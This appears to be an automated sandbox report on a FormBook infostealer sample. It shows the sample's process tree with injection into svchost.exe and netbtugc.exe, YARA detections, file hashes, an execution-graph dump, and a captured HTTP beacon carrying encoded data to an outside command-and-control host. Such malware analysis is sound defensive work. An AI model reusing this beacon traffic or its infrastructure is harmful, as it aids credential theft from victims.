                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              24 | 192.168.2.4 | 50026 | 217.196.55.202 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Nov 21, 2024 12:56:51.546552896 CET | 510 | OUT | GET /fo8o/?SHqP-p=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&0xilO=7vZpwBG HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Host: www.empowermedeco.com
                                                                              Connection: close
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Nov 21, 2024 12:56:52.794786930 CET | 1227 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Connection: close
                                                                              content-type: text/html
                                                                              content-length: 795
                                                                              date: Thu, 21 Nov 2024 11:56:52 GMT
                                                                              server: LiteSpeed
                                                                              location: https://www.empowermedeco.com/fo8o/?SHqP-p=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&0xilO=7vZpwBG
                                                                              platform: hostinger
                                                                              panel: hpanel
                                                                              content-security-policy: upgrade-insecure-requests
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                              Target ID:0
                                                                              Start time:06:52:57
                                                                              Start date:21/11/2024
                                                                              Path:C:\Users\user\Desktop\Certificate 1045-20-11.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Certificate 1045-20-11.exe"
                                                                              Imagebase:0x840000
                                                                              File size:1'196'032 bytes
                                                                              MD5 hash:374BFA99CAF54477156253C18125CDC8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:06:52:59
                                                                              Start date:21/11/2024
                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Certificate 1045-20-11.exe"
                                                                              Imagebase:0x3d0000
                                                                              File size:46'504 bytes
                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1870531753.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1870531753.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1871626103.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1871626103.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:06:53:07
                                                                              Start date:21/11/2024
                                                                              Path:C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe"
                                                                              Imagebase:0x170000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4166827472.0000000002450000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4166827472.0000000002450000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:3
                                                                              Start time:06:53:09
                                                                              Start date:21/11/2024
                                                                              Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                              Imagebase:0x8c0000
                                                                              File size:22'016 bytes
                                                                              MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4165463340.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4165463340.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4165026551.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4165026551.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Target ID:7
                                                                              Start time:06:53:22
                                                                              Start date:21/11/2024
                                                                              Path:C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe"
                                                                              Imagebase:0x170000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4168934011.0000000004AD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4168934011.0000000004AD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:8
                                                                              Start time:06:53:34
                                                                              Start date:21/11/2024
                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                              Imagebase:0x800000
                                                                              File size:676'768 bytes
                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true


                                                                                Execution Graph

                                                                                Execution Coverage:4%
                                                                                Dynamic/Decrypted Code Coverage:1.5%
                                                                                Signature Coverage:6.3%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:66
8a084b _strcat _wcscpy __NMSG_WRITE 94184->94190 94185->94145 94186 84cf93 58 API calls 94186->94190 94187 84d286 48 API calls 94187->94190 94188 84936c 81 API calls 94188->94190 94189 86395c 47 API calls __crtCompareStringA_stat 94189->94190 94190->94185 94190->94186 94190->94187 94190->94188 94190->94189 94241 888035 50 API calls __NMSG_WRITE 94190->94241 94194 85ed2d 94192->94194 94193 85edc5 VirtualProtect 94195 85ed93 94193->94195 94194->94193 94194->94195 94195->94148 94195->94149 94197 851cf6 94196->94197 94200 851ba2 94196->94200 94197->94164 94199 851c5d 94199->94164 94201 85f4ea 48 API calls 94200->94201 94210 851bae 94200->94210 94202 8b49c4 94201->94202 94203 85f4ea 48 API calls 94202->94203 94211 8b49cf 94203->94211 94204 851bb9 94204->94199 94205 85f4ea 48 API calls 94204->94205 94206 851c9f 94205->94206 94208 851cb2 94206->94208 94242 842925 48 API calls 94206->94242 94208->94164 94209 85f4ea 48 API calls 94209->94211 94210->94204 94243 85c15c 48 API calls 94210->94243 94211->94209 94211->94210 94213 8a0427 94212->94213 94224 8a0443 94212->94224 94214 8a04f8 94213->94214 94215 8a042e 94213->94215 94216 8a044f 94213->94216 94213->94224 94253 889dc5 103 API calls 94214->94253 94250 887c56 50 API calls _strlen 94215->94250 94252 84cdb9 48 API calls 94216->94252 94217 8a051e 94217->94164 94222 8a0438 94251 84cdb9 48 API calls 94222->94251 94224->94217 94244 861c9d 94224->94244 94225->94158 94226->94158 94227->94152 94228->94164 94229->94137 94231 881f3b __NMSG_WRITE 94230->94231 94232 881f79 94231->94232 94234 881f6f 94231->94234 94236 881ffa 94231->94236 94232->94171 94232->94177 94234->94232 94239 85d37a 60 API calls 94234->94239 94236->94232 94240 85d37a 60 API calls 94236->94240 94237->94175 94238->94174 94239->94234 94240->94236 94241->94190 94242->94208 94243->94204 94245 861ca6 RtlFreeHeap 94244->94245 94246 861ccf _free 94244->94246 94245->94246 94247 861cbb 94245->94247 94246->94217 94254 867c0e 47 API calls __getptd_noexit 94247->94254 94249 
861cc1 GetLastError 94249->94246 94250->94222 94251->94224 94252->94224 94253->94224 94254->94249 94256 84d654 94255->94256 94264 84d67e 94255->94264 94257 84d65b 94256->94257 94260 84d6c2 94256->94260 94258 84d6ab 94257->94258 94259 84d666 94257->94259 94258->94264 94268 85dce0 53 API calls 94258->94268 94267 84d9a0 53 API calls __cinit 94259->94267 94260->94258 94269 85dce0 53 API calls 94260->94269 94264->93973 94265->93973 94266->93972 94267->94264 94268->94264 94269->94258 94270->94045 94271->94011 94272->94019 94274 854637 94273->94274 94275 85479f 94273->94275 94277 854643 94274->94277 94278 8b6e05 94274->94278 94276 84ce19 48 API calls 94275->94276 94285 8546e4 Mailbox 94276->94285 94371 854300 335 API calls ___crtGetEnvironmentStringsW 94277->94371 94280 89e822 335 API calls 94278->94280 94281 8b6e11 94280->94281 94282 854739 Mailbox 94281->94282 94372 88cc5c 86 API calls 4 library calls 94281->94372 94282->94045 94284 854659 94284->94281 94284->94282 94284->94285 94288 896ff0 335 API calls 94285->94288 94321 886524 94285->94321 94324 88fa0c 94285->94324 94365 844252 94285->94365 94288->94282 94290->94022 94291->94027 95178 84bd30 94292->95178 94294 853267 94295 853313 Mailbox ___crtGetEnvironmentStringsW 94294->94295 95252 85c36b 86 API calls 94294->95252 94297 88cc5c 86 API calls 94295->94297 94300 84d645 53 API calls 94295->94300 94303 84d6e9 55 API calls 94295->94303 94306 84fe30 335 API calls 94295->94306 94308 85c3c3 48 API calls 94295->94308 94311 85f4ea 48 API calls 94295->94311 94313 85c2d6 48 API calls 94295->94313 94314 846eed 48 API calls 94295->94314 94316 84dcae 50 API calls 94295->94316 94317 853635 Mailbox 94295->94317 95183 842b7a 94295->95183 95190 84e8d0 94295->95190 95253 84d9a0 53 API calls __cinit 94295->95253 95254 84d8c0 53 API calls 94295->95254 95255 89f320 335 API calls 94295->95255 95256 89f5ee 335 API calls 94295->95256 95257 841caa 49 API calls 94295->95257 95258 89cda2 82 API calls Mailbox 94295->95258 95259 8880e3 53 API 
calls 94295->95259 95260 84d764 55 API calls 94295->95260 95261 88c942 50 API calls 94295->95261 94297->94295 94300->94295 94303->94295 94306->94295 94308->94295 94311->94295 94313->94295 94314->94295 94316->94295 94317->94045 94318->94037 94319->94039 94320->94043 94373 886ca9 GetFileAttributesW 94321->94373 94325 88fa1c __ftell_nolock 94324->94325 94326 88fa44 94325->94326 94465 84d286 48 API calls 94325->94465 94328 84936c 81 API calls 94326->94328 94329 88fa5e 94328->94329 94330 88fb92 94329->94330 94331 88fb68 94329->94331 94332 88fa80 94329->94332 94330->94282 94377 8441a9 94331->94377 94334 84936c 81 API calls 94332->94334 94339 88fa8c _wcscpy _wcschr 94334->94339 94336 88fb8e 94336->94330 94338 84936c 81 API calls 94336->94338 94337 8441a9 136 API calls 94337->94336 94340 88fbc7 94338->94340 94344 88fab0 _wcscat _wcscpy 94339->94344 94348 88fade _wcscat 94339->94348 94401 861dfc 94340->94401 94342 84936c 81 API calls 94343 88fafc _wcscpy 94342->94343 94466 8872cb GetFileAttributesW 94343->94466 94346 84936c 81 API calls 94344->94346 94346->94348 94347 88fb1c __NMSG_WRITE 94347->94330 94350 84936c 81 API calls 94347->94350 94348->94342 94349 88fbeb _wcscat _wcscpy 94352 84936c 81 API calls 94349->94352 94351 88fb48 94350->94351 94467 8860dd 77 API calls 4 library calls 94351->94467 94354 88fc82 94352->94354 94404 88690b 94354->94404 94355 88fb5c 94355->94330 94357 88fca2 94358 886524 3 API calls 94357->94358 94359 88fcb1 94358->94359 94360 84936c 81 API calls 94359->94360 94362 88fce2 94359->94362 94361 88fccb 94360->94361 94410 88bfa4 94361->94410 94364 844252 84 API calls 94362->94364 94364->94330 94366 84425c 94365->94366 94368 844263 94365->94368 94367 8635e4 __fcloseall 83 API calls 94366->94367 94367->94368 94369 844272 94368->94369 94370 844283 FreeLibrary 94368->94370 94369->94282 94370->94369 94371->94284 94372->94282 94374 886529 94373->94374 94375 886cc4 FindFirstFileW 94373->94375 94374->94282 94375->94374 94376 886cd9 FindClose 94375->94376 
94376->94374 94468 844214 94377->94468 94382 8441d4 LoadLibraryExW 94478 844291 94382->94478 94383 8b4f73 94385 844252 84 API calls 94383->94385 94387 8b4f7a 94385->94387 94389 844291 3 API calls 94387->94389 94391 8b4f82 94389->94391 94390 8441fb 94390->94391 94392 844207 94390->94392 94504 8444ed 94391->94504 94394 844252 84 API calls 94392->94394 94396 84420c 94394->94396 94396->94336 94396->94337 94398 8b4fa9 94512 844950 94398->94512 94810 861e46 94401->94810 94405 886918 _wcschr __ftell_nolock 94404->94405 94406 861dfc __wsplitpath 47 API calls 94405->94406 94409 88692e _wcscat _wcscpy 94405->94409 94407 88695d 94406->94407 94408 861dfc __wsplitpath 47 API calls 94407->94408 94408->94409 94409->94357 94411 88bfb1 __ftell_nolock 94410->94411 94412 85f4ea 48 API calls 94411->94412 94413 88c00e 94412->94413 94414 8447b7 48 API calls 94413->94414 94415 88c018 94414->94415 94416 88bdb4 GetSystemTimeAsFileTime 94415->94416 94417 88c023 94416->94417 94418 844517 83 API calls 94417->94418 94419 88c036 _wcscmp 94418->94419 94420 88c05a 94419->94420 94421 88c107 94419->94421 94866 88c56d 94420->94866 94423 88c56d 94 API calls 94421->94423 94425 88c0d3 _wcscat 94423->94425 94427 8444ed 64 API calls 94425->94427 94429 88c110 94425->94429 94426 861dfc __wsplitpath 47 API calls 94431 88c088 _wcscat _wcscpy 94426->94431 94428 88c12c 94427->94428 94430 8444ed 64 API calls 94428->94430 94429->94362 94432 88c13c 94430->94432 94434 861dfc __wsplitpath 47 API calls 94431->94434 94433 8444ed 64 API calls 94432->94433 94435 88c157 94433->94435 94434->94425 94436 8444ed 64 API calls 94435->94436 94437 88c167 94436->94437 94438 8444ed 64 API calls 94437->94438 94439 88c182 94438->94439 94440 8444ed 64 API calls 94439->94440 94441 88c192 94440->94441 94442 8444ed 64 API calls 94441->94442 94443 88c1a2 94442->94443 94444 8444ed 64 API calls 94443->94444 94445 88c1b2 94444->94445 94836 88c71a GetTempPathW GetTempFileNameW 94445->94836 94447 88c1be 94448 863499 117 API calls 
94447->94448 94458 88c1cf 94448->94458 94449 88c289 94850 8635e4 94449->94850 94451 88c294 94453 88c29a DeleteFileW 94451->94453 94454 88c2ae 94451->94454 94452 8444ed 64 API calls 94452->94458 94453->94429 94455 88c342 CopyFileW 94454->94455 94460 88c2b8 94454->94460 94456 88c358 DeleteFileW 94455->94456 94457 88c36a DeleteFileW 94455->94457 94456->94429 94863 88c6d9 CreateFileW 94457->94863 94458->94429 94458->94449 94458->94452 94837 862aae 94458->94837 94872 88b965 94460->94872 94464 88c331 DeleteFileW 94464->94429 94465->94326 94466->94347 94467->94355 94517 844339 94468->94517 94471 84423c 94473 844244 FreeLibrary 94471->94473 94474 8441bb 94471->94474 94473->94474 94475 863499 94474->94475 94525 8634ae 94475->94525 94477 8441c8 94477->94382 94477->94383 94721 8442e4 94478->94721 94481 8442b8 94482 8442c1 FreeLibrary 94481->94482 94483 8441ec 94481->94483 94482->94483 94485 844380 94483->94485 94486 85f4ea 48 API calls 94485->94486 94487 844395 94486->94487 94729 8447b7 94487->94729 94489 8443a1 ___crtGetEnvironmentStringsW 94490 8443dc 94489->94490 94491 8444d1 94489->94491 94492 844499 94489->94492 94493 844950 57 API calls 94490->94493 94743 88c750 93 API calls 94491->94743 94732 84406b CreateStreamOnHGlobal 94492->94732 94501 8443e5 94493->94501 94496 8444ed 64 API calls 94496->94501 94497 844479 94497->94390 94499 8b4ed7 94500 844517 83 API calls 94499->94500 94502 8b4eeb 94500->94502 94501->94496 94501->94497 94501->94499 94738 844517 94501->94738 94503 8444ed 64 API calls 94502->94503 94503->94497 94505 8b4fc0 94504->94505 94506 8444ff 94504->94506 94767 86381e 94506->94767 94509 88bf5a 94787 88bdb4 94509->94787 94511 88bf70 94511->94398 94513 84495f 94512->94513 94516 8b5002 94512->94516 94792 863e65 94513->94792 94515 844967 94521 84434b 94517->94521 94520 844321 LoadLibraryA GetProcAddress 94520->94471 94522 84422f 94521->94522 94523 844354 LoadLibraryA 94521->94523 94522->94471 94522->94520 94523->94522 94524 844365 GetProcAddress 94523->94524 
94524->94522 94527 8634ba __mtinitlocknum 94525->94527 94526 8634cd 94573 867c0e 47 API calls __getptd_noexit 94526->94573 94527->94526 94529 8634fe 94527->94529 94544 86e4c8 94529->94544 94530 8634d2 94574 866e10 8 API calls __vswprintf_l 94530->94574 94533 863503 94534 86350c 94533->94534 94535 863519 94533->94535 94575 867c0e 47 API calls __getptd_noexit 94534->94575 94537 863543 94535->94537 94538 863523 94535->94538 94558 86e5e0 94537->94558 94576 867c0e 47 API calls __getptd_noexit 94538->94576 94542 8634dd __mtinitlocknum @_EH4_CallFilterFunc@8 94542->94477 94545 86e4d4 __mtinitlocknum 94544->94545 94578 867cf4 94545->94578 94547 86e559 94614 8669d0 47 API calls __crtCompareStringA_stat 94547->94614 94548 86e552 94585 86e5d7 94548->94585 94551 86e560 94551->94548 94553 86e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94551->94553 94552 86e5cc __mtinitlocknum 94552->94533 94553->94548 94556 86e4e2 94556->94547 94556->94548 94588 867d7c 94556->94588 94612 864e5b 48 API calls __lock 94556->94612 94613 864ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94556->94613 94566 86e600 __wopenfile 94558->94566 94559 86e61a 94626 867c0e 47 API calls __getptd_noexit 94559->94626 94561 86e61f 94627 866e10 8 API calls __vswprintf_l 94561->94627 94563 86354e 94577 863570 LeaveCriticalSection LeaveCriticalSection _fprintf 94563->94577 94564 86e838 94623 8763c9 94564->94623 94566->94559 94566->94566 94572 86e7d5 94566->94572 94628 86185b 59 API calls 3 library calls 94566->94628 94568 86e7ce 94568->94572 94629 86185b 59 API calls 3 library calls 94568->94629 94570 86e7ed 94570->94572 94630 86185b 59 API calls 3 library calls 94570->94630 94572->94559 94572->94564 94573->94530 94574->94542 94575->94542 94576->94542 94577->94542 94579 867d05 94578->94579 94580 867d18 EnterCriticalSection 94578->94580 94581 867d7c __mtinitlocknum 46 API calls 94579->94581 94580->94556 94582 867d0b 94581->94582 94582->94580 94615 86115b 47 API calls 3 library calls 
94582->94615 94616 867e58 LeaveCriticalSection 94585->94616 94587 86e5de 94587->94552 94589 867d88 __mtinitlocknum 94588->94589 94590 867d91 94589->94590 94591 867da9 94589->94591 94617 8681c2 47 API calls __NMSG_WRITE 94590->94617 94598 867e11 __mtinitlocknum 94591->94598 94606 867da7 94591->94606 94593 867d96 94618 86821f 47 API calls 6 library calls 94593->94618 94596 867dbd 94599 867dc4 94596->94599 94600 867dd3 94596->94600 94597 867d9d 94619 861145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94597->94619 94598->94556 94621 867c0e 47 API calls __getptd_noexit 94599->94621 94601 867cf4 __lock 46 API calls 94600->94601 94605 867dda 94601->94605 94604 867dc9 94604->94598 94607 867dfe 94605->94607 94608 867de9 InitializeCriticalSectionAndSpinCount 94605->94608 94606->94591 94620 8669d0 47 API calls __crtCompareStringA_stat 94606->94620 94610 861c9d _free 46 API calls 94607->94610 94609 867e04 94608->94609 94622 867e1a LeaveCriticalSection _doexit 94609->94622 94610->94609 94612->94556 94613->94556 94614->94551 94616->94587 94617->94593 94618->94597 94620->94596 94621->94604 94622->94598 94631 875bb1 94623->94631 94625 8763e2 94625->94563 94626->94561 94627->94563 94628->94568 94629->94570 94630->94572 94634 875bbd __mtinitlocknum 94631->94634 94632 875bcf 94718 867c0e 47 API calls __getptd_noexit 94632->94718 94634->94632 94636 875c06 94634->94636 94635 875bd4 94719 866e10 8 API calls __vswprintf_l 94635->94719 94642 875c78 94636->94642 94639 875c23 94720 875c4c LeaveCriticalSection __unlock_fhandle 94639->94720 94641 875bde __mtinitlocknum 94641->94625 94643 875c98 94642->94643 94644 86273b __wsopen_helper 47 API calls 94643->94644 94647 875cb4 94644->94647 94645 866e20 __invoke_watson 8 API calls 94646 8763c8 94645->94646 94649 875bb1 __wsopen_helper 104 API calls 94646->94649 94648 875cee 94647->94648 94656 875d11 94647->94656 94665 875deb 94647->94665 94650 867bda __set_osfhnd 47 API calls 94648->94650 94651 8763e2 94649->94651 94652 
875cf3 94650->94652 94651->94639 94653 867c0e __mtinitlocknum 47 API calls 94652->94653 94654 875d00 94653->94654 94655 866e10 __vswprintf_l 8 API calls 94654->94655 94658 875d0a 94655->94658 94657 875dcf 94656->94657 94664 875dad 94656->94664 94659 867bda __set_osfhnd 47 API calls 94657->94659 94658->94639 94660 875dd4 94659->94660 94661 867c0e __mtinitlocknum 47 API calls 94660->94661 94662 875de1 94661->94662 94663 866e10 __vswprintf_l 8 API calls 94662->94663 94663->94665 94666 86a979 __wsopen_helper 52 API calls 94664->94666 94665->94645 94667 875e7b 94666->94667 94668 875ea6 94667->94668 94669 875e85 94667->94669 94670 875b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94668->94670 94671 867bda __set_osfhnd 47 API calls 94669->94671 94680 875ec8 94670->94680 94672 875e8a 94671->94672 94674 867c0e __mtinitlocknum 47 API calls 94672->94674 94673 875f46 GetFileType 94675 875f93 94673->94675 94676 875f51 GetLastError 94673->94676 94678 875e94 94674->94678 94688 86ac0b __set_osfhnd 48 API calls 94675->94688 94679 867bed __dosmaperr 47 API calls 94676->94679 94677 875f14 GetLastError 94681 867bed __dosmaperr 47 API calls 94677->94681 94682 867c0e __mtinitlocknum 47 API calls 94678->94682 94683 875f78 CloseHandle 94679->94683 94680->94673 94680->94677 94684 875b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94680->94684 94685 875f39 94681->94685 94682->94658 94683->94685 94686 875f86 94683->94686 94687 875f09 94684->94687 94690 867c0e __mtinitlocknum 47 API calls 94685->94690 94689 867c0e __mtinitlocknum 47 API calls 94686->94689 94687->94673 94687->94677 94693 875fb1 94688->94693 94691 875f8b 94689->94691 94690->94665 94691->94685 94692 87616c 94692->94665 94695 87633f CloseHandle 94692->94695 94693->94692 94694 86f82f __lseeki64_nolock 49 API calls 94693->94694 94711 876032 94693->94711 94696 87601b 94694->94696 94697 875b20 ___createFile GetModuleHandleW GetProcAddress 